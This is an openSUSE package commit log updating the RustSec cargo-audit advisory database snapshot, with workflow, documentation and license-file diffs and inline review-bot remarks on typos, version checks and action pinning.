Script 'mail_helper' called by obssrc
Hello community,

here is the log from the commit of package cargo-audit-advisory-db for openSUSE:Factory checked in at 2023-10-08 12:18:26
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Comparing /work/SRC/openSUSE:Factory/cargo-audit-advisory-db (Old)
 and      /work/SRC/openSUSE:Factory/.cargo-audit-advisory-db.new.28202 (New)
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Package is "cargo-audit-advisory-db"

Sun Oct  8 12:18:26 2023 rev:36 rq:1116152 version:20231007

Changes:
--------
--- /work/SRC/openSUSE:Factory/cargo-audit-advisory-db/cargo-audit-advisory-db.changes        2023-08-18 19:29:25.199430049 +0200
+++ /work/SRC/openSUSE:Factory/.cargo-audit-advisory-db.new.28202/cargo-audit-advisory-db.changes       2023-10-08 12:21:50.113743998 +0200
@@ -1,0 +2,15 @@
+Sat Oct 07 01:19:51 UTC 2023 - william.br...@suse.com
+
+- Update to version 20231007:
+  * Assigned RUSTSEC-2023-0066 to pleaser (#1799)
+  * Document the privilege-escalation vulnerability in pleaser. (#1798)
+  * Update webpki RUSTSEC-2023-0052 advisory. (#1797)
+  * Assigned RUSTSEC-2023-0065 to tungstenite (#1796)
+  * Create advisory for tungstenite DoS (#1795)
+  * Add patch version (#1794)
+  * Update info about CVE-2023-5129 (#1793)
+  * Bump rustsec-admin to 0.8.8 (#1791)
+  * Assigned RUSTSEC-2023-0064 to gix-transport (#1790)
+  * Add notice to gix-transport crate (#1789)
+
+-------------------------------------------------------------------

Old:
----
  advisory-db-20230818.tar.xz

New:
----
  advisory-db-20231007.tar.xz

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Other differences:
------------------
++++++ cargo-audit-advisory-db.spec ++++++
--- /var/tmp/diff_new_pack.gv6pdT/_old  2023-10-08 12:21:51.137780816 +0200
+++ /var/tmp/diff_new_pack.gv6pdT/_new  2023-10-08 12:21:51.137780816 +0200
@@ -17,7 +17,7 @@
 
 
 Name:           cargo-audit-advisory-db
-Version:        20230818
+Version:        20231007
 Release:        0
 Summary:        A database of known security issues for Rust depedencies
 License:        CC0-1.0
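Review bot: The unchanged Summary context line still carries the typo "depedencies"; since the spec is being touched for the version bump anyway, correct it to "A database of known security issues for Rust dependencies" in the same change.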

++++++ _service ++++++
--- /var/tmp/diff_new_pack.gv6pdT/_old  2023-10-08 12:21:51.161781679 +0200
+++ /var/tmp/diff_new_pack.gv6pdT/_new  2023-10-08 12:21:51.165781823 +0200
@@ -2,7 +2,7 @@
   <service mode="disabled" name="obs_scm">
     <param name="url">https://github.com/RustSec/advisory-db.git</param>
     <param name="scm">git</param>
-    <param name="version">20230818</param>
+    <param name="version">20231007</param>
     <param name="revision">main</param>
     <param name="changesgenerate">enable</param>
     <param name="changesauthor">william.br...@suse.com</param>
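Review bot: Only the `version` parameter moves to 20231007 while `revision` stays at `main`, so a re-run of the obs_scm service fetches whatever `main` points to at that moment, not necessarily the snapshot that produced advisory-db-20231007.tar.xz. Pinning `revision` to the upstream commit hash behind this snapshot would make the source fetch reproducible and let a reviewer verify the tarball against a fixed upstream state.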

++++++ advisory-db-20230818.tar.xz -> advisory-db-20231007.tar.xz ++++++
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/advisory-db-20230818/.duplicate-id-guard new/advisory-db-20231007/.duplicate-id-guard
--- old/advisory-db-20230818/.duplicate-id-guard        2023-08-14 19:14:25.000000000 +0200
+++ new/advisory-db-20231007/.duplicate-id-guard        2023-10-03 15:53:18.000000000 +0200
@@ -1,3 +1,3 @@
 This file causes merge conflicts if two ID assignment jobs run concurrently.
 This prevents duplicate ID assignment due to a race between those jobs.
-e315acbba1dcf156464306c5a2fae64532f7b99cfbf4935bf3b894f2174c7de2  -
+36a9b51a48b3404a0625daab077982cb323512602246febf46ad480eee672625  -
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/advisory-db-20230818/.github/workflows/assign-ids.yml new/advisory-db-20231007/.github/workflows/assign-ids.yml
--- old/advisory-db-20230818/.github/workflows/assign-ids.yml   2023-08-14 19:14:25.000000000 +0200
+++ new/advisory-db-20231007/.github/workflows/assign-ids.yml   2023-10-03 15:53:18.000000000 +0200
@@ -9,17 +9,17 @@
     name: Assign IDs
     runs-on: ubuntu-latest
     steps:
-    - uses: actions/checkout@v3
+    - uses: actions/checkout@v4
 
     - name: Cache cargo bin
       uses: actions/cache@v3
       with:
         path: ~/.cargo/bin
-        key: rustsec-admin-v0.8.6
+        key: rustsec-admin-v0.8.8
 
     - name: Install rustsec-admin
       run: |
-        VERSION="0.8.6"
+        VERSION="0.8.8"
         if ! ( rustsec-admin --version | grep -q "$VERSION" ); then
           cargo install rustsec-admin --force --vers "$VERSION"
         fi
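Review bot: The version check `rustsec-admin --version | grep -q "$VERSION"` passes the version as an unanchored regular expression, so the dots match any character and "0.8.8" would also be satisfied by a longer version such as "0.8.80"; use a literal match (`grep -qF -- "$VERSION"`) or compare the reported version exactly. Separately, `actions/checkout` is bumped to the `v4` tag while `actions/cache` stays at `v3`, and both are mutable tags; for a workflow that commits ID assignments back to the advisory repository, pinning each action to a full commit SHA gives a verifiable record of what ran.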
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/advisory-db-20230818/.github/workflows/export-osv.yml new/advisory-db-20231007/.github/workflows/export-osv.yml
--- old/advisory-db-20230818/.github/workflows/export-osv.yml   2023-08-14 19:14:25.000000000 +0200
+++ new/advisory-db-20231007/.github/workflows/export-osv.yml   2023-10-03 15:53:18.000000000 +0200
@@ -8,15 +8,15 @@
   publish-web:
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v3
+      - uses: actions/checkout@v4
         with:
           ref: osv
       - uses: actions/cache@v3
         with:
           path: ~/.cargo/bin
-          key: rustsec-admin-v0.8.6
+          key: rustsec-admin-v0.8.8
       - run: |
-          VERSION="0.8.6"
+          VERSION="0.8.8"
           if ! ( rustsec-admin --version | grep -q "$VERSION" ); then
             cargo install rustsec-admin --force --vers "$VERSION"
           fi
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/advisory-db-20230818/.github/workflows/publish-web.yml new/advisory-db-20231007/.github/workflows/publish-web.yml
--- old/advisory-db-20230818/.github/workflows/publish-web.yml  2023-08-14 19:14:25.000000000 +0200
+++ new/advisory-db-20231007/.github/workflows/publish-web.yml  2023-10-03 15:53:18.000000000 +0200
@@ -8,15 +8,15 @@
   publish-web:
     runs-on: ubuntu-latest
     steps:
-      - uses: actions/checkout@v3
+      - uses: actions/checkout@v4
         with:
           ref: gh-pages
       - uses: actions/cache@v3
         with:
           path: ~/.cargo/bin
-          key: rustsec-admin-v0.8.6
+          key: rustsec-admin-v0.8.8
       - run: |
-          VERSION="0.8.6"
+          VERSION="0.8.8"
           if ! ( rustsec-admin --version | grep -q "$VERSION" ); then
             cargo install rustsec-admin --force --vers "$VERSION"
           fi
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/advisory-db-20230818/.github/workflows/validate.yml new/advisory-db-20231007/.github/workflows/validate.yml
--- old/advisory-db-20230818/.github/workflows/validate.yml     2023-08-14 19:14:25.000000000 +0200
+++ new/advisory-db-20231007/.github/workflows/validate.yml     2023-10-03 15:53:18.000000000 +0200
@@ -10,17 +10,17 @@
     name: Lint advisories
     runs-on: ubuntu-latest
     steps:
-    - uses: actions/checkout@v3
+    - uses: actions/checkout@v4
 
     - name: Cache cargo bin
       uses: actions/cache@v3
       with:
         path: ~/.cargo/bin
-        key: rustsec-admin-v0.8.6
+        key: rustsec-admin-v0.8.8
 
     - name: Install rustsec-admin
       run: |
-        VERSION="0.8.6"
+        VERSION="0.8.8"
         if ! ( rustsec-admin --version | grep -q "$VERSION" ); then
           cargo install rustsec-admin --force --vers "$VERSION"
         fi
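Review bot: This is the fourth copy of the same cache-key / `VERSION` / `cargo install rustsec-admin` block (assign-ids.yml, export-osv.yml, publish-web.yml, validate.yml), each bumped by hand from 0.8.6 to 0.8.8. Factoring the install step into a composite action or a reusable workflow with a single version input would make the next bump a one-line change and remove the risk of the four copies drifting apart.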
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/advisory-db-20230818/CONTRIBUTING.md new/advisory-db-20231007/CONTRIBUTING.md
--- old/advisory-db-20230818/CONTRIBUTING.md    2023-08-14 19:14:25.000000000 +0200
+++ new/advisory-db-20231007/CONTRIBUTING.md    2023-10-03 15:53:18.000000000 +0200
@@ -52,13 +52,13 @@
 
 **Q: Do I need to be owner of a crate to file an advisory?**
 
-A:  No, anyone can file an advisory against any crate. The legitimacy of
+A: No, anyone can file an advisory against any crate. The legitimacy of
     vulnerabilities will be determined prior to merging. If a vulnerability
-    turns out to be fake it will be removed from the database.
+    turns out to be fake, it will be removed from the database.
     
 **Q: Can I file an advisory without creating a pull request?**
 
-A: Yes, instead of creating a full advisory yourself you can also
+A: Yes, instead of creating a full advisory yourself, you can also
    [open an issue on the advisory-db 
repo](https://github.com/RustSec/advisory-db/issues)
    or email information about the vulnerability to
    [rust...@googlegroups.com](mailto:rust...@googlegroups.com).
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/advisory-db-20230818/EXAMPLE_ADVISORY.md new/advisory-db-20231007/EXAMPLE_ADVISORY.md
--- old/advisory-db-20230818/EXAMPLE_ADVISORY.md        2023-08-14 19:14:25.000000000 +0200
+++ new/advisory-db-20231007/EXAMPLE_ADVISORY.md        2023-10-03 15:53:18.000000000 +0200
@@ -26,7 +26,7 @@
 This is an example template for a RustSec advisory. Please copy this to
 `crates/<crate-name>` and rename it to `RUSTSEC-0000-0000.md`.
 
-In this section of the advisory you can write an extended description
+In this section of the advisory, you can write an extended description
 of the vulnerability, will be converted into HTML and rendered at
 <https://rustsec.org>.
 
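Review bot: The sentence being edited is still missing its relative pronoun in the unchanged continuation: "of the vulnerability, will be converted into HTML" should read "of the vulnerability, which will be converted into HTML". Since the preceding line is already rewritten for punctuation, fix the grammar in the same pass.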
@@ -34,10 +34,10 @@
 - TOML "front matter". See `README.md` for schema.
 - Please include as much detail as you'd like.
 
-A well structured advisory will include information like:
+A well-structured advisory will include information like:
 
 Affected versions of this crate did not properly check for integer overflow 
when allocating a buffer in `MyBuffer::with_capacity()` (bug 
description/location/root cause).
 
-This can result in a memory corruption (consequence of the bug) when large 
integer is given to the parameter (trigger condition).
+This can result in a memory corruption (consequence of the bug) when a large 
integer is given to the parameter (trigger condition).
 
 The flaw was corrected in commit abc123 by using `saturating_mul()` when 
calculating the buffer size (fix description).
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/advisory-db-20230818/LICENSE.txt new/advisory-db-20231007/LICENSE.txt
--- old/advisory-db-20230818/LICENSE.txt        2023-08-14 19:14:25.000000000 +0200
+++ new/advisory-db-20231007/LICENSE.txt        2023-10-03 15:53:18.000000000 +0200
@@ -1,7 +1,7 @@
-All code and data in the RustSec advisory database repository is dedicated to
-the public domain:
-
-https://creativecommons.org/publicdomain/zero/1.0/
+All code and data in the RustSec advisory database repository are dedicated to
+the public domain (except otherwise specified, see exception below), and are
+available under Creative Commons Zero 1.O Universal license (see
+LICENSES/CC0-1.0.txt for terms).
 
 By committing to this repository, you hereby waive all rights to the work
 worldwide under copyright law, including all related and neighboring rights, to
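Review bot: The third added line has a letter O in the version number: "Creative Commons Zero 1.O Universal license" should be "1.0" (digit zero), matching the LICENSES/CC0-1.0.txt file it points to. "except otherwise specified" also reads better as "except where otherwise specified".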
@@ -10,10 +10,20 @@
 You can copy, modify, distribute, and retransmit any information in this
 repository, even for commercial purposes, without asking permission.
 
-Additional content from GitHub Security Advisory ("GHSA") database
+----
+
+Exception: Additional content imported from the GitHub Security Advisory
+("GHSA") database.
 
-Additional content may be adapted from GHSA with attribution requirements, but
-with no additional clauses like copyleft.
+Additional content is adapted from GitHub Security Advisory, and is available
+under Creative Commons Attribution 4.0 International (see
+LICENSES/CC-BY-4.0.txt for terms).
+
+Any such license and attribution will be explicitly covered, respectively in
+the "license" and "url" (pointing to the advisory GHSA identifier prefixed by
+https://github.com/advisories) metadata fields, directly within the applicable
+advisories. As stated in the terms linked below, this fulfills the attribution
+requirement.
 
-Any such license and attribution will be explicitly covered on an advisory by
-advisory basis directly within the applicable advisories.
+https://docs.github.com/en/site-policy/github-terms/github-terms-for-additional-
+products-and-features#advisory-database
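Review bot: The closing reference URL is split across two lines ("…github-terms-for-additional-" / "products-and-features#advisory-database"), so nothing that renders or lints the file will recognise it as a link; keep it on one line. The paragraph above it also says "As stated in the terms linked below", so the link should be the literal, unbroken URL it refers to.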
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' '--exclude=.svnignore' old/advisory-db-20230818/LICENSES/CC-BY-4.0.txt new/advisory-db-20231007/LICENSES/CC-BY-4.0.txt
--- old/advisory-db-20230818/LICENSES/CC-BY-4.0.txt     1970-01-01 01:00:00.000000000 +0100
+++ new/advisory-db-20231007/LICENSES/CC-BY-4.0.txt     2023-10-03 15:53:18.000000000 +0200
@@ -0,0 +1,428 @@
+Attribution-ShareAlike 4.0 International
+
+=======================================================================
+
+Creative Commons Corporation ("Creative Commons") is not a law firm and
+does not provide legal services or legal advice. Distribution of
+Creative Commons public licenses does not create a lawyer-client or
+other relationship. Creative Commons makes its licenses and related
+information available on an "as-is" basis. Creative Commons gives no
+warranties regarding its licenses, any material licensed under their
+terms and conditions, or any related information. Creative Commons
+disclaims all liability for damages resulting from their use to the
+fullest extent possible.
+
+Using Creative Commons Public Licenses
+
+Creative Commons public licenses provide a standard set of terms and
+conditions that creators and other rights holders may use to share
+original works of authorship and other material subject to copyright
+and certain other rights specified in the public license below. The
+following considerations are for informational purposes only, are not
+exhaustive, and do not form part of our licenses.
+
+     Considerations for licensors: Our public licenses are
+     intended for use by those authorized to give the public
+     permission to use material in ways otherwise restricted by
+     copyright and certain other rights. Our licenses are
+     irrevocable. Licensors should read and understand the terms
+     and conditions of the license they choose before applying it.
+     Licensors should also secure all rights necessary before
+     applying our licenses so that the public can reuse the
+     material as expected. Licensors should clearly mark any
+     material not subject to the license. This includes other CC-
+     licensed material, or material used under an exception or
+     limitation to copyright. More considerations for licensors:
+    wiki.creativecommons.org/Considerations_for_licensors
+
+     Considerations for the public: By using one of our public
+     licenses, a licensor grants the public permission to use the
+     licensed material under specified terms and conditions. If
+     the licensor's permission is not necessary for any reason--for
+     example, because of any applicable exception or limitation to
+     copyright--then that use is not regulated by the license. Our
+     licenses grant only permissions under copyright and certain
+     other rights that a licensor has authority to grant. Use of
+     the licensed material may still be restricted for other
+     reasons, including because others have copyright or other
+     rights in the material. A licensor may make special requests,
+     such as asking that all changes be marked or described.
+     Although not required by our licenses, you are encouraged to
+     respect those requests where reasonable. More considerations
+     for the public:
+    wiki.creativecommons.org/Considerations_for_licensees
+
+=======================================================================
+
+Creative Commons Attribution-ShareAlike 4.0 International Public
+License
+
+By exercising the Licensed Rights (defined below), You accept and agree
+to be bound by the terms and conditions of this Creative Commons
+Attribution-ShareAlike 4.0 International Public License ("Public
+License"). To the extent this Public License may be interpreted as a
+contract, You are granted the Licensed Rights in consideration of Your
+acceptance of these terms and conditions, and the Licensor grants You
+such rights in consideration of benefits the Licensor receives from
+making the Licensed Material available under these terms and
+conditions.
+
+
+Section 1 -- Definitions.
+
+  a. Adapted Material means material subject to Copyright and Similar
+     Rights that is derived from or based upon the Licensed Material
+     and in which the Licensed Material is translated, altered,
+     arranged, transformed, or otherwise modified in a manner requiring
+     permission under the Copyright and Similar Rights held by the
+     Licensor. For purposes of this Public License, where the Licensed
+     Material is a musical work, performance, or sound recording,
+     Adapted Material is always produced where the Licensed Material is
+     synched in timed relation with a moving image.
+
+  b. Adapter's License means the license You apply to Your Copyright
+     and Similar Rights in Your contributions to Adapted Material in
+     accordance with the terms and conditions of this Public License.
+
+  c. BY-SA Compatible License means a license listed at
+     creativecommons.org/compatiblelicenses, approved by Creative
+     Commons as essentially the equivalent of this Public License.
+
+  d. Copyright and Similar Rights means copyright and/or similar rights
+     closely related to copyright including, without limitation,
+     performance, broadcast, sound recording, and Sui Generis Database
+     Rights, without regard to how the rights are labeled or
+     categorized. For purposes of this Public License, the rights
+     specified in Section 2(b)(1)-(2) are not Copyright and Similar
+     Rights.
+
+  e. Effective Technological Measures means those measures that, in the
+     absence of proper authority, may not be circumvented under laws
+     fulfilling obligations under Article 11 of the WIPO Copyright
+     Treaty adopted on December 20, 1996, and/or similar international
+     agreements.
+
+  f. Exceptions and Limitations means fair use, fair dealing, and/or
+     any other exception or limitation to Copyright and Similar Rights
+     that applies to Your use of the Licensed Material.
+
+  g. License Elements means the license attributes listed in the name
+     of a Creative Commons Public License. The License Elements of this
+     Public License are Attribution and ShareAlike.
+
+  h. Licensed Material means the artistic or literary work, database,
+     or other material to which the Licensor applied this Public
+     License.
+
+  i. Licensed Rights means the rights granted to You subject to the
+     terms and conditions of this Public License, which are limited to
+     all Copyright and Similar Rights that apply to Your use of the
+     Licensed Material and that the Licensor has authority to license.
+
+  j. Licensor means the individual(s) or entity(ies) granting rights
+     under this Public License.
+
+  k. Share means to provide material to the public by any means or
+     process that requires permission under the Licensed Rights, such
+     as reproduction, public display, public performance, distribution,
+     dissemination, communication, or importation, and to make material
+     available to the public including in ways that members of the
+     public may access the material from a place and at a time
+     individually chosen by them.
+
+  l. Sui Generis Database Rights means rights other than copyright
+     resulting from Directive 96/9/EC of the European Parliament and of
+     the Council of 11 March 1996 on the legal protection of databases,
+     as amended and/or succeeded, as well as other essentially
+     equivalent rights anywhere in the world.
+
+  m. You means the individual or entity exercising the Licensed Rights
+     under this Public License. Your has a corresponding meaning.
+
+
+Section 2 -- Scope.
+
+  a. License grant.
+
+       1. Subject to the terms and conditions of this Public License,
+          the Licensor hereby grants You a worldwide, royalty-free,
+          non-sublicensable, non-exclusive, irrevocable license to
+          exercise the Licensed Rights in the Licensed Material to:
+
+            a. reproduce and Share the Licensed Material, in whole or
+               in part; and
+
+            b. produce, reproduce, and Share Adapted Material.
+
+       2. Exceptions and Limitations. For the avoidance of doubt, where
+          Exceptions and Limitations apply to Your use, this Public
+          License does not apply, and You do not need to comply with
+          its terms and conditions.
+
+       3. Term. The term of this Public License is specified in Section
+          6(a).
+
+       4. Media and formats; technical modifications allowed. The
+          Licensor authorizes You to exercise the Licensed Rights in
+          all media and formats whether now known or hereafter created,
+          and to make technical modifications necessary to do so. The
+          Licensor waives and/or agrees not to assert any right or
+          authority to forbid You from making technical modifications
+          necessary to exercise the Licensed Rights, including
+          technical modifications necessary to circumvent Effective
+          Technological Measures. For purposes of this Public License,
+          simply making modifications authorized by this Section 2(a)
+          (4) never produces Adapted Material.
+
+       5. Downstream recipients.
+
+            a. Offer from the Licensor -- Licensed Material. Every
+               recipient of the Licensed Material automatically
+               receives an offer from the Licensor to exercise the
+               Licensed Rights under the terms and conditions of this
+               Public License.
+
+            b. Additional offer from the Licensor -- Adapted Material.
+               Every recipient of Adapted Material from You
+               automatically receives an offer from the Licensor to
+               exercise the Licensed Rights in the Adapted Material
+               under the conditions of the Adapter's License You apply.
+
+            c. No downstream restrictions. You may not offer or impose
+               any additional or different terms or conditions on, or
+               apply any Effective Technological Measures to, the
+               Licensed Material if doing so restricts exercise of the
+               Licensed Rights by any recipient of the Licensed
+               Material.
+
+       6. No endorsement. Nothing in this Public License constitutes or
+          may be construed as permission to assert or imply that You
+          are, or that Your use of the Licensed Material is, connected
+          with, or sponsored, endorsed, or granted official status by,
+          the Licensor or others designated to receive attribution as
+          provided in Section 3(a)(1)(A)(i).
+
+  b. Other rights.
+
+       1. Moral rights, such as the right of integrity, are not
+          licensed under this Public License, nor are publicity,
+          privacy, and/or other similar personality rights; however, to
+          the extent possible, the Licensor waives and/or agrees not to
+          assert any such rights held by the Licensor to the limited
+          extent necessary to allow You to exercise the Licensed
+          Rights, but not otherwise.
+
+       2. Patent and trademark rights are not licensed under this
+          Public License.
+
+       3. To the extent possible, the Licensor waives any right to
+          collect royalties from You for the exercise of the Licensed
+          Rights, whether directly or through a collecting society
+          under any voluntary or waivable statutory or compulsory
+          licensing scheme. In all other cases the Licensor expressly
+          reserves any right to collect such royalties.
+
+
+Section 3 -- License Conditions.
+
+Your exercise of the Licensed Rights is expressly made subject to the
+following conditions.
+
+  a. Attribution.
+
+       1. If You Share the Licensed Material (including in modified
+          form), You must:
+
+            a. retain the following if it is supplied by the Licensor
+               with the Licensed Material:
+
+                 i. identification of the creator(s) of the Licensed
+                    Material and any others designated to receive
+                    attribution, in any reasonable manner requested by
+                    the Licensor (including by pseudonym if
+                    designated);
+
+                ii. a copyright notice;
+
+               iii. a notice that refers to this Public License;
+
+                iv. a notice that refers to the disclaimer of
+                    warranties;
+
+                 v. a URI or hyperlink to the Licensed Material to the
+                    extent reasonably practicable;
+
+            b. indicate if You modified the Licensed Material and
+               retain an indication of any previous modifications; and
+
+            c. indicate the Licensed Material is licensed under this
+               Public License, and include the text of, or the URI or
+               hyperlink to, this Public License.
+
+       2. You may satisfy the conditions in Section 3(a)(1) in any
+          reasonable manner based on the medium, means, and context in
+          which You Share the Licensed Material. For example, it may be
+          reasonable to satisfy the conditions by providing a URI or
+          hyperlink to a resource that includes the required
+          information.
+
+       3. If requested by the Licensor, You must remove any of the
+          information required by Section 3(a)(1)(A) to the extent
+          reasonably practicable.
+
+  b. ShareAlike.
+
+     In addition to the conditions in Section 3(a), if You Share
+     Adapted Material You produce, the following conditions also apply.
+
+       1. The Adapter's License You apply must be a Creative Commons
+          license with the same License Elements, this version or
+          later, or a BY-SA Compatible License.
+
+       2. You must include the text of, or the URI or hyperlink to, the
+          Adapter's License You apply. You may satisfy this condition
+          in any reasonable manner based on the medium, means, and
+          context in which You Share Adapted Material.
+
+       3. You may not offer or impose any additional or different terms
+          or conditions on, or apply any Effective Technological
+          Measures to, Adapted Material that restrict exercise of the
+          rights granted under the Adapter's License You apply.
+
+
+Section 4 -- Sui Generis Database Rights.
+
+Where the Licensed Rights include Sui Generis Database Rights that
+apply to Your use of the Licensed Material:
+
+  a. for the avoidance of doubt, Section 2(a)(1) grants You the right
+     to extract, reuse, reproduce, and Share all or a substantial
+     portion of the contents of the database;
+
+  b. if You include all or a substantial portion of the database
+     contents in a database in which You have Sui Generis Database
+     Rights, then the database in which You have Sui Generis Database
+     Rights (but not its individual contents) is Adapted Material,
+     including for purposes of Section 3(b); and
+
+  c. You must comply with the conditions in Section 3(a) if You Share
+     all or a substantial portion of the contents of the database.
+
+For the avoidance of doubt, this Section 4 supplements and does not
+replace Your obligations under this Public License where the Licensed
+Rights include other Copyright and Similar Rights.
+
+
+Section 5 -- Disclaimer of Warranties and Limitation of Liability.
+
+  a. UNLESS OTHERWISE SEPARATELY UNDERTAKEN BY THE LICENSOR, TO THE
+     EXTENT POSSIBLE, THE LICENSOR OFFERS THE LICENSED MATERIAL AS-IS
+     AND AS-AVAILABLE, AND MAKES NO REPRESENTATIONS OR WARRANTIES OF
+     ANY KIND CONCERNING THE LICENSED MATERIAL, WHETHER EXPRESS,
+     IMPLIED, STATUTORY, OR OTHER. THIS INCLUDES, WITHOUT LIMITATION,
+     WARRANTIES OF TITLE, MERCHANTABILITY, FITNESS FOR A PARTICULAR
+     PURPOSE, NON-INFRINGEMENT, ABSENCE OF LATENT OR OTHER DEFECTS,
+     ACCURACY, OR THE PRESENCE OR ABSENCE OF ERRORS, WHETHER OR NOT
+     KNOWN OR DISCOVERABLE. WHERE DISCLAIMERS OF WARRANTIES ARE NOT
+     ALLOWED IN FULL OR IN PART, THIS DISCLAIMER MAY NOT APPLY TO YOU.
+
+  b. TO THE EXTENT POSSIBLE, IN NO EVENT WILL THE LICENSOR BE LIABLE
+     TO YOU ON ANY LEGAL THEORY (INCLUDING, WITHOUT LIMITATION,
+     NEGLIGENCE) OR OTHERWISE FOR ANY DIRECT, SPECIAL, INDIRECT,
+     INCIDENTAL, CONSEQUENTIAL, PUNITIVE, EXEMPLARY, OR OTHER LOSSES,
+     COSTS, EXPENSES, OR DAMAGES ARISING OUT OF THIS PUBLIC LICENSE OR
+     USE OF THE LICENSED MATERIAL, EVEN IF THE LICENSOR HAS BEEN
+     ADVISED OF THE POSSIBILITY OF SUCH LOSSES, COSTS, EXPENSES, OR
+     DAMAGES. WHERE A LIMITATION OF LIABILITY IS NOT ALLOWED IN FULL OR
+     IN PART, THIS LIMITATION MAY NOT APPLY TO YOU.
+
+  c. The disclaimer of warranties and limitation of liability provided
+     above shall be interpreted in a manner that, to the extent
+     possible, most closely approximates an absolute disclaimer and
+     waiver of all liability.
+
+
+Section 6 -- Term and Termination.
+
+  a. This Public License applies for the term of the Copyright and
+     Similar Rights licensed here. However, if You fail to comply with
+     this Public License, then Your rights under this Public License
+     terminate automatically.
+
+  b. Where Your right to use the Licensed Material has terminated under
+     Section 6(a), it reinstates:
+
+       1. automatically as of the date the violation is cured, provided
+          it is cured within 30 days of Your discovery of the
+          violation; or
+
+       2. upon express reinstatement by the Licensor.
+
+     For the avoidance of doubt, this Section 6(b) does not affect any
+     right the Licensor may have to seek remedies for Your violations
+     of this Public License.
+
+  c. For the avoidance of doubt, the Licensor may also offer the
+     Licensed Material under separate terms or conditions or stop
+     distributing the Licensed Material at any time; however, doing so
+     will not terminate this Public License.
+
+  d. Sections 1, 5, 6, 7, and 8 survive termination of this Public
+     License.
+
+
+Section 7 -- Other Terms and Conditions.
+
+  a. The Licensor shall not be bound by any additional or different
+     terms or conditions communicated by You unless expressly agreed.
+
+  b. Any arrangements, understandings, or agreements regarding the
+     Licensed Material not stated herein are separate from and
+     independent of the terms and conditions of this Public License.
+
+
+Section 8 -- Interpretation.
+
+  a. For the avoidance of doubt, this Public License does not, and
+     shall not be interpreted to, reduce, limit, restrict, or impose
+     conditions on any use of the Licensed Material that could lawfully
+     be made without permission under this Public License.
+
+  b. To the extent possible, if any provision of this Public License is
+     deemed unenforceable, it shall be automatically reformed to the
+     minimum extent necessary to make it enforceable. If the provision
+     cannot be reformed, it shall be severed from this Public License
+     without affecting the enforceability of the remaining terms and
+     conditions.
+
+  c. No term or condition of this Public License will be waived and no
+     failure to comply consented to unless expressly agreed to by the
+     Licensor.
+
+  d. Nothing in this Public License constitutes or may be interpreted
+     as a limitation upon, or waiver of, any privileges and immunities
+     that apply to the Licensor or You, including from the legal
+     processes of any jurisdiction or authority.
+
+
+=======================================================================
+
+Creative Commons is not a party to its public
+licenses. Notwithstanding, Creative Commons may elect to apply one of
+its public licenses to material it publishes and in those instances
+will be considered the “Licensor.” The text of the Creative Commons
+public licenses is dedicated to the public domain under the CC0 Public
+Domain Dedication. Except for the limited purpose of indicating that
+material is shared under a Creative Commons public license or as
+otherwise permitted by the Creative Commons policies published at
+creativecommons.org/policies, Creative Commons does not authorize the
+use of the trademark "Creative Commons" or any other trademark or logo
+of Creative Commons without its prior written consent including,
+without limitation, in connection with any unauthorized modifications
+to any of its public licenses or any other arrangements,
+understandings, or agreements concerning use of licensed material. For
+the avoidance of doubt, this paragraph does not form part of the
+public licenses.
+
+Creative Commons may be contacted at creativecommons.org.
+
diff -urN '--exclude=CVS' '--exclude=.cvsignore' '--exclude=.svn' 
'--exclude=.svnignore' old/advisory-db-20230818/LICENSES/CC0-1.0.txt 
new/advisory-db-20231007/LICENSES/CC0-1.0.txt
--- old/advisory-db-20230818/LICENSES/CC0-1.0.txt       1970-01-01 
01:00:00.000000000 +0100
+++ new/advisory-db-20231007/LICENSES/CC0-1.0.txt       2023-10-03 
15:53:18.000000000 +0200
@@ -0,0 +1,121 @@
+Creative Commons Legal Code
+
+CC0 1.0 Universal
+
+    CREATIVE COMMONS CORPORATION IS NOT A LAW FIRM AND DOES NOT PROVIDE
+    LEGAL SERVICES. DISTRIBUTION OF THIS DOCUMENT DOES NOT CREATE AN
+    ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS PROVIDES THIS
+    INFORMATION ON AN "AS-IS" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES
+    REGARDING THE USE OF THIS DOCUMENT OR THE INFORMATION OR WORKS
+    PROVIDED HEREUNDER, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING FROM
+    THE USE OF THIS DOCUMENT OR THE INFORMATION OR WORKS PROVIDED
+    HEREUNDER.
+
+Statement of Purpose
+
+The laws of most jurisdictions throughout the world automatically confer
+exclusive Copyright and Related Rights (defined below) upon the creator
+and subsequent owner(s) (each and all, an "owner") of an original work of
+authorship and/or a database (each, a "Work").
+
+Certain owners wish to permanently relinquish those rights to a Work for
+the purpose of contributing to a commons of creative, cultural and
+scientific works ("Commons") that the public can reliably and without fear
+of later claims of infringement build upon, modify, incorporate in other
+works, reuse and redistribute as freely as possible in any form whatsoever
+and for any purposes, including without limitation commercial purposes.
+These owners may contribute to the Commons to promote the ideal of a free
+culture and the further production of creative, cultural and scientific
+works, or to gain reputation or greater distribution for their Work in
+part through the use and efforts of others.
+
+For these and/or other purposes and motivations, and without any
+expectation of additional consideration or compensation, the person
+associating CC0 with a Work (the "Affirmer"), to the extent that he or she
+is an owner of Copyright and Related Rights in the Work, voluntarily
+elects to apply CC0 to the Work and publicly distribute the Work under its
+terms, with knowledge of his or her Copyright and Related Rights in the
+Work and the meaning and intended legal effect of CC0 on those rights.
+
+1. Copyright and Related Rights. A Work made available under CC0 may be
+protected by copyright and related or neighboring rights ("Copyright and
+Related Rights"). Copyright and Related Rights include, but are not
